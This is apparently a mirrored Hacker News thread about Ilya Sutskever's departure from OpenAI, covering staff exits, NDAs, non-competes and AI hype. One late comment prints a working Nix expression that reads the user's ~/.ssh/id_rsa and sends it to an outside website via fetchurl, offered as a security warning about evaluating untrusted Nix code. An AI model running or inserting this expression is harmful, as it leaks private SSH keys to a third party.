zlacker

Ilya Sutskever to leave OpenAI

submitted by wavela+(OP) on 2024-05-14 23:01:26 | 1124 points 754 comments
[view article] [source] [go to bottom]

NOTE: showing posts with links only show all posts
1. wavela+q[view] [source] 2024-05-14 23:05:22
>>wavela+(OP)
Altman's tweet (https://x.com/sama/status/1790518031640347056?s=46) makes it seem as if he wanted to stay, and Ilya disagreed and "chose" to depart. Very interesting framing.
39. reduce+O4[view] [source] 2024-05-14 23:42:16
>>wavela+(OP)
'Back in May 2023, before Ilya Sutskever started to speak at the event, I sat next to him and told him, “Ilya, I listened to all of your podcast interviews. And unlike Sam Altman, who spread the AI panic all over the place, you sound much more calm, rational, and nuanced. I think you do a really good service to your work, to what you develop, to OpenAI.” He blushed a bit, and said, “Oh, thank you. I appreciate the compliment.”

An hour and a half later, when we finished this talk, I looked at my friend and told her, “I’m taking back every single word that I said to Ilya.”

He freaked the hell out of people there. And we’re talking about AI professionals who work in the biggest AI labs in the Bay area. They were leaving the room, saying, “Holy shit.”

The snapshots above cannot capture the lengthy discussion. The point is that Ilya Sutskever took what you see in the media, the “AGI utopia vs. potential apocalypse” ideology, to the next level. It was traumatizing.'[0]

[0] What Ilya Sutskever Really Wants https://www.aipanic.news/p/what-ilya-sutskever-really-wants

◧◩
55. selcuk+86[view] [source] [discussion] 2024-05-14 23:57:32
>>wavela+q
Someone has already tried doing that, and it's pretty close:

https://twitter.com/eli_schein/status/1790520139164614820

◧◩◪
59. mbesto+i6[view] [source] [discussion] 2024-05-14 23:59:25
>>threes+85
> Most of the VCs have already spent their money in the last couple of years.

Lol no. There is roughly $500B in VC dollars, not to mention $1.2T in buyout dry powder, still floating around. And venture funds raised continue to grow YoY.

https://www.bain.com/globalassets/noindex/2024/bain_report_g...

81. quylea+o8[view] [source] 2024-05-15 00:18:15
>>wavela+(OP)
Tesla also lost its top AI lead [0]. Will they go to Apple?

[0] >>40361350

◧◩◪
82. cjbpri+s8[view] [source] [discussion] 2024-05-15 00:19:03
>>lr4444+I6
I think those are illegal nationwide now. They've been illegal in California for a long time.

https://www.ftc.gov/news-events/news/press-releases/2024/04/...

◧◩◪◨⬒⬓
116. hacker+He[view] [source] [discussion] 2024-05-15 01:15:28
>>mikeg8+F8
https://www.nytimes.com/2024/03/07/technology/openai-executi...
◧◩
134. andsoi+Dg[view] [source] [discussion] 2024-05-15 01:36:09
>>ed_mer+j5
According to Mr Altman’s tweet (https://twitter.com/sama/status/1790518031640347056) they had not just one but TWO of the greatest minds of this generation.

After this change they will have only one.

144. Bjorkb+fh[view] [source] 2024-05-15 01:41:18
>>wavela+(OP)
Probably not related, but it's worth pointing out that Daniel Kokotajlo (https://www.lesswrong.com/users/daniel-kokotajlo) left last month.

But if it were related, then that would presumably be because people within the company (or at least two rather noteworthy people) no longer believe that OpenAI is acting in the best interests of humanity.

Which isn't too shocking really given that a decent chunk of us feel the same way, but then again, we're just nobodies making dumb comments on Hacker News. It's a little different when someone like Ilya really doesn't want to be at OpenAI.

◧◩◪
155. bkyan+Ai[view] [source] [discussion] 2024-05-15 01:54:50
>>hacker+Y1
Reid Hoffman provided some clear (at least to me) evidence for Mira's non-involvement → https://youtu.be/IgcUOOI-egk?si=FiSPt87v3pM3lfKt&t=851
◧◩◪◨
159. __Matr+1j[view] [source] [discussion] 2024-05-15 01:59:06
>>behnam+ch
I've been offered a "lump" of sugar before, and it was not a single sugar crystal. When I hear "large grain of salt" I imagine something like this https://crystalverse.com/sodium-chloride-crystals/, quite different than a lump.
◧◩◪◨⬒
219. ignora+Wo[view] [source] [discussion] 2024-05-15 03:07:59
>>reduce+Wm
You misremember: https://www.youtube.com/watch?v=7nORLckDnmg&t=75

mirror: https://ghostarchive.org/varchive/7nORLckDnmg (1m 15s)

◧◩◪◨
247. branda+Ku[view] [source] [discussion] 2024-05-15 04:14:26
>>bkyan+Ai
Someone just above posted this, which shows that she did reach out to the board with concerns about his leadership style prior to the ouster: https://www.nytimes.com/2024/03/07/technology/openai-executi...
◧◩◪◨⬒
261. vitus+Qv[view] [source] [discussion] 2024-05-15 04:28:15
>>goatlo+Kh
Einstein wasn't arguing just against the Copenhagen interpretation; he was arguing against the very notion of physical nondeterminism.

In fact, his arguments against nonlocality were disproven experimentally in the '80s, when Bell tests showed correlations that no local hidden-variable theory can reproduce [0].

I don't think anyone _likes_ the Copenhagen interpretation per se; it's just the least objectionable choice (if you have to make one at all). Many-worlds sounds cool and all until you realize that it's essentially impossible to verify experimentally, and at that point you're discussing philosophy and what-ifs more than physics.

Intuition only gets you as far as the accuracy of your mental model. Is it intuitive that the volume enclosed by the unit hypersphere approaches zero [1] as its dimension goes to infinity? Or that photons have momentum, but no mass? Or that you can draw higher-dimensional Venn diagrams with sectors that have negative area? If these all make intuitive sense to you, I'm jealous that your intuition extends further than mine.

[0] https://en.wikipedia.org/wiki/Bell_test

[1] https://en.wikipedia.org/wiki/Volume_of_an_n-ball
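
For the hypersphere claim, this is just restating the standard formula from [1]: the unit n-ball has volume

    V_n = \frac{\pi^{n/2}}{\Gamma(n/2 + 1)}

and because the Gamma function in the denominator grows faster than \pi^{n/2}, the volume peaks around n = 5 and then tends to zero as n \to \infty.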

◧◩◪
290. zandre+4z[view] [source] [discussion] 2024-05-15 05:11:21
>>surfin+ey
Non-competes were already invalid in the state of California, and now they're invalid in the entirety of the U.S. [1]

[1] https://www.ftc.gov/news-events/news/press-releases/2024/04/...

◧◩◪◨
302. snigge+mA[view] [source] [discussion] 2024-05-15 05:28:33
>>justan+as
Incorrect, he led a recruiting battle for Ilya: https://www.youtube.com/watch?v=7nORLckDnmg&t=75s
◧◩◪◨
312. robotr+0B[view] [source] [discussion] 2024-05-15 05:35:16
>>seydor+ov
Times have changed.

https://machinelearning.apple.com/research

321. ascorb+6C[view] [source] 2024-05-15 05:45:41
>>wavela+(OP)
Jan Leike has said he's leaving too https://twitter.com/janleike/status/1790603862132596961
◧◩◪◨⬒
361. bbor+MH[view] [source] [discussion] 2024-05-15 06:52:10
>>Otomot+hG
As something of a (biased) expert: yes, it's a big deal, and yes, this seemingly dumb breakthrough was the last missing piece. It takes a few dozen hours of philosophy to show why your brain is also composed of recursive structures of probabilistic machines, so forget that; it's not necessary. Instead, take a glance at these two links:

1. Alan Turing on why we should never ever perform a Turing test: https://redirect.cs.umbc.edu/courses/471/papers/turing.pdf

2. Marvin Minsky on the “Frame Problem” that led to one or two previous AI winters, and what an intuitive algorithm might look like: https://ojs.aaai.org/aimagazine/index.php/aimagazine/article...

388. jakoza+8N[view] [source] 2024-05-15 07:49:15
>>wavela+(OP)
Jakub Pachocki is amazing. He was in the top 20 in the Polish algorithm competition:

https://oi.edu.pl/contestants/Jakub%20Pachocki/

◧◩
395. rfoo+UN[view] [source] [discussion] 2024-05-15 07:56:27
>>jakoza+8N
Wait, TIL Jakub Pachocki == meret [1], never made the connection.

[1] https://codeforces.com/profile/meret

◧◩◪◨⬒⬓⬔⧯
409. reduce+FP[view] [source] [discussion] 2024-05-15 08:11:18
>>Shrezz+9O
Kokotajlo: “To clarify: I did sign something when I joined the company, so I'm still not completely free to speak (still under confidentiality obligations). But I didn't take on any additional obligations when I left.

Unclear how to value the equity I gave up, but it probably would have been about 85% of my family's net worth at least.

Basically I wanted to retain my ability to criticize the company in the future.”

> but "stop working on your field of research" isn't going to happen.

We’re talking about an NDA; obviously non-competes aren’t legal in CA.

https://www.lesswrong.com/posts/kovCotfpTFWFXaxwi/?commentId...

◧◩◪◨⬒⬓
439. hugg+ZV[view] [source] [discussion] 2024-05-15 09:19:29
>>astran+sS
https://www.forbes.com/sites/jamesbroughel/2023/12/09/openai...
◧◩◪◨⬒
452. Miralt+SY[view] [source] [discussion] 2024-05-15 09:53:31
>>Otomot+hG
This paper and other similar works changed my opinion on that quite a bit. They show that, to perform text prediction, LLMs build complex internal models.

>>38893456

◧◩◪
459. chx+vZ[view] [source] [discussion] 2024-05-15 09:58:32
>>nabla9+pH
> When the next wave of new deep learning innovations sweeps the world,

That won't happen; the next scam will be different.

It was crypto until FTX collapsed; then the usual suspects, led by a16z, leaned on OpenAI to rush whatever they had to market, hence the odd naming of ChatGPT 3.5.

When the hype is finally realized to be just mass printing bullshit -- relevant bullshit, yes, which sometimes can be useful but not billions of dollars of useful -- there will be something else.

Same old, same old. The only difference is that there are no new catchy tunes. Yet? https://youtu.be/I6IQ_FOCE6I https://locusmag.com/2023/12/commentary-cory-doctorow-what-k...

◧◩◪◨
473. vinter+P21[view] [source] [discussion] 2024-05-15 10:40:58
>>debate+BL
Oops, I thought there was something odd; I got my rationality acronyms mixed up. Hutter's program was called AIXI (MIRI was the research lab).

Here is Leike's paper, coauthored with Hutter:

https://arxiv.org/abs/1510.04931

They can probably sum it up in their own paper better than I can, but AIXI was supposed to be a formalized, objective model of rationality. They knew from the start that it was uncomputable, but I think they hoped to use it as a sort of gold standard that you could approach.

But then it turned out that the choice of Turing machine, which can be (mostly) ignored for Kolmogorov complexity, cannot be ignored in AIXI at all.
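
My gloss, not a claim from their paper: for Kolmogorov complexity, the machine dependence is tamed by the invariance theorem, which bounds the difference between any two universal prefix machines U and V by a constant independent of the string,

    |K_U(x) - K_V(x)| \le c_{U,V} \quad \text{for all strings } x,

whereas AIXI has no analogous guarantee; the choice of universal machine shapes the prior and, with it, the agent's behavior.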

◧◩◪◨⬒⬓⬔⧯
527. luma+Jd1[view] [source] [discussion] 2024-05-15 12:08:08
>>cthalu+ed1
That's exactly what I'm talking about: https://i.imgur.com/sZ3tniY.jpeg
◧◩◪
558. sonofa+Ti1[view] [source] [discussion] 2024-05-15 12:42:00
>>izend+Yx
Aidan Gomez, Nick Frosst, and Ivan Zhang, all of whom were Hinton's students at UofT, started Cohere (https://cohere.com/about)
◧◩◪◨⬒
583. chx+ct1[view] [source] [discussion] 2024-05-15 13:37:51
>>trasht+X21
All crypto"currencies" with a transaction fee are negative-sum games, and as such they are a scam. It's been nine years since the Washington Post, admittedly somewhat clumsily, drew attention to this, and people still insist it's something other than a scam. Despite heady articles about how it's going to solve world hunger, it's just a scam.

This round of AI is only capable of producing bullshit. Relevant bullshit but bullshit. This can be useful https://hachyderm.io/@inthehands/112006855076082650 but it doesn't mean it's more impactful than the Internet.

◧◩◪
655. Furiou+Sd2[view] [source] [discussion] 2024-05-15 17:12:52
>>nabla9+pH
Jakub Pachocki is taking over as chief scientist. https://analyticsindiamag.com/meet-jakub-pachocki-openais-ne...
◧◩◪◨⬒⬓⬔⧯▣▦
679. jagrsw+jt2[view] [source] [discussion] 2024-05-15 18:31:25
>>Jensso+of2
> A model that is as good as an average human but costs $10 000 per effective manhour to run is not very useful, but it is still an AGI.

Geohot (https://geohot.github.io/blog/) estimates that a human brain equivalent requires 20 PFLOPS. Current top-of-the-line GPUs are around 2 PFLOPS and consume up to 500W. Scaling that linearly results in 5kW, which translates to approximately 3 EUR per hour if I calculate correctly.
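
Spelling that arithmetic out (the ~0.6 EUR/kWh electricity price is my assumption, chosen to make the figure land near 3 EUR):

    20\ \text{PFLOPS} \div 2\ \text{PFLOPS/GPU} = 10\ \text{GPUs}, \quad 10 \times 500\ \text{W} = 5\ \text{kW}, \quad 5\ \text{kW} \times 0.6\ \text{EUR/kWh} \approx 3\ \text{EUR/h}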

◧◩◪◨⬒⬓⬔⧯
705. sheesh+fe3[view] [source] [discussion] 2024-05-15 23:23:50
>>bsenft+f51
epic… and likely not a single one of these “experts” can solve even a basic goat problem https://x.com/svpino/status/1790624957380342151
◧◩◪◨⬒⬓
732. CyberS+o15[view] [source] [discussion] 2024-05-16 16:46:07
>>karma_+nu
Hi, sorry for the unrelated comment. I actually wanted to reply to your comment at >>40208937 , but that comment was made too long ago and I can no longer reply to it directly.

In that comment, you wrote:

> It can delete your home directory or email your ssh private keys to Zimbabwe.

I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):

    let
      # Pin a specific nixpkgs revision so pkgs.lib.escapeURL is available
      pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
    in
    # Read the private key at evaluation time, URL-encode it, and leak it as a query string
    builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"
It does not need --impure or any other unusual switches to work.

Hope this helps.

◧◩◪◨⬒⬓⬔
749. karma_+Gx9[view] [source] [discussion] 2024-05-18 10:25:07
>>CyberS+o15
How is that supposed to "delete my home directory"?

Also, it doesn't work:

    error: access to absolute path '/home/user/.ssh/id_rsa' is forbidden in restricted mode
Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Hope this helps.

I don't think it did. I'm not sure what it was supposed to help with.

◧◩◪◨⬒⬓⬔⧯
753. CyberS+eYj[view] [source] [discussion] 2024-05-22 06:26:04
>>karma_+Gx9
> How is that supposed to "delete my home directory"?

Ah, I over-quoted that part. My mistake.

> Also, it doesn't work:

It will work with the default Nix settings.

> Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

One would need to first turn it on to be able to turn it off.

> https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Indeed, note the default value.

> I don't think it did. I'm not sure what it was supposed to help with.

I was hoping that it would be interesting to you, but also help avoid spreading false information that might mislead people into evaluating Nix code when it's not safe to do so. But, I think I understand now that maybe you don't care about what happens to other people.

[go to top]